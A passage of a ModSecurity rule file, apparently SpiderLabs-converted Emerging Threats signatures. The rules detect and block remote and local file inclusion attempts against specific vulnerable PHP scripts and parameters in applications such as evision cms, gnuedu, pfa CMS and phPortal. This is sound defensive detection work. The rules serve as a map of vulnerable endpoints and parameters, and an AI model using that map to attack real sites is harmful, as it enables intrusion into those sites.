WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008855) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/tour/adminpart/addtour.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008855,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/articles/adminpart/addarticles.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008856,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/product/adminpart/addproduct.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008857,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008858) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/plain/adminpart/addplain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008858,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS epay a_affil.php _REQUEST Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /e-pay/src/a_affil.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010661,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS epay a_affil.php _REQUEST Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10697'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_REQUEST[read]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS epay a_affil.php _REQUEST Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009188) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gapicms toolbar.php dirDepth Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /toolbar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009188,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS gapicms toolbar.php dirDepth Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:dirDepth/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gapicms toolbar.php dirDepth Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003718) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR SecRule REQUEST_LINE "@contains /libs/lom.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003718,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR SecRule REQUEST_LINE "@contains /lom_update.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003719,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003720) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR SecRule REQUEST_LINE "@contains /scripts/check-lom.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003720,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003721) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR SecRule REQUEST_LINE "@contains /scripts/weigh_keywords.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003721,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- logout.php ETCDIR SecRule REQUEST_LINE "@contains /logout.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003722,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- logout.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- logout.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003723) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- help.php ETCDIR SecRule REQUEST_LINE "@contains /help.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003723,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- help.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- help.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- index.php ETCDIR SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003724,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- index.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- index.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003725) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- login.php ETCDIR SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003725,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- login.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- login.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR SecRule REQUEST_LINE "@contains /web/lom.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003747,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'" SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010979) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ispCP Omega admin1.template.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /tools/filemanager/skins/mobile/admin1.template.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010979,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ispCP Omega admin1.template.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,38644'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:net2ftp_globals[application_skinsdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ispCP Omega admin1.template.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS justVisual contact.php fs_jVroot Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /test/pages/contact.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010191,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS justVisual contact.php fs_jVroot Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:fs_jVroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS justVisual contact.php fs_jVroot Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010192) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS justVisual pageTemplate.php fs_jVroot Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /system/pageTemplate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010192,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS justVisual pageTemplate.php fs_jVroot Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:fs_jVroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS justVisual pageTemplate.php fs_jVroot Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS justVisual utilities.php fs_jVroot Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /system/utilities.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010193,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS justVisual utilities.php fs_jVroot Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:fs_jVroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS justVisual utilities.php fs_jVroot Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009053) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS Thumbnail.php base_path Remote File Inclusion SecRule REQUEST_LINE "@contains /Thumbnail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009053,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS Thumbnail.php base_path Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:base_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS Thumbnail.php base_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003684) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MXBB Remote Inclusion Attempt -- faq.php module_root_path SecRule REQUEST_LINE "@contains /faq.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003684,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MXBB Remote Inclusion Attempt -- faq.php module_root_path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3833'" SecRule &TX:'/RFI.*ARGS:cmd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MXBB Remote Inclusion Attempt -- faq.php module_root_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion SecRule REQUEST_LINE "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009719,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:templates_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009720) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion SecRule REQUEST_LINE "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009720,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003698) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php abs_path SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003698,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003699) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion checkout.php abs_path SecRule REQUEST_LINE "@contains /checkout.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003699,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion checkout.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion checkout.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003700) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion libsecure.php abs_path SecRule REQUEST_LINE "@contains /libsecure.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003700,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion libsecure.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion libsecure.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003701) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php repinc SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003701,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php repinc',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467827/100/0/threaded'" SecRule &TX:'/RFI.*ARGS:repinc/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php repinc',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009325) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /gunaysoft.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009325,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:icerikyolu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009326) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /gunaysoft.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009326,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sayfaid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009327) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php uzanti Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /gunaysoft.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009327,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php uzanti Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:uzanti/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phPortal gunaysoft.php uzanti Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP phpMyAgenda rootagenda Remote File Include Attempt SecRule &TX:'/RFI.*ARGS:rootagenda/' "@gt 0" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002879,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP phpMyAgenda rootagenda Remote File Include Attempt',tag:'web-application-attack',tag:'bugtraq,17670'" SecRule &TX:'/RFI.*ARGS:rootagenda/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP phpMyAgenda rootagenda Remote File Include Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009397) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpProfiles body_comm.inc.php content parameter remote file inclusion SecRule REQUEST_LINE "@contains /body_comm.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009397,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpProfiles body_comm.inc.php content parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,27952'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:content/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpProfiles body_comm.inc.php content parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion SecRule REQUEST_LINE "@contains /addedit-render.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008992,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32774'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 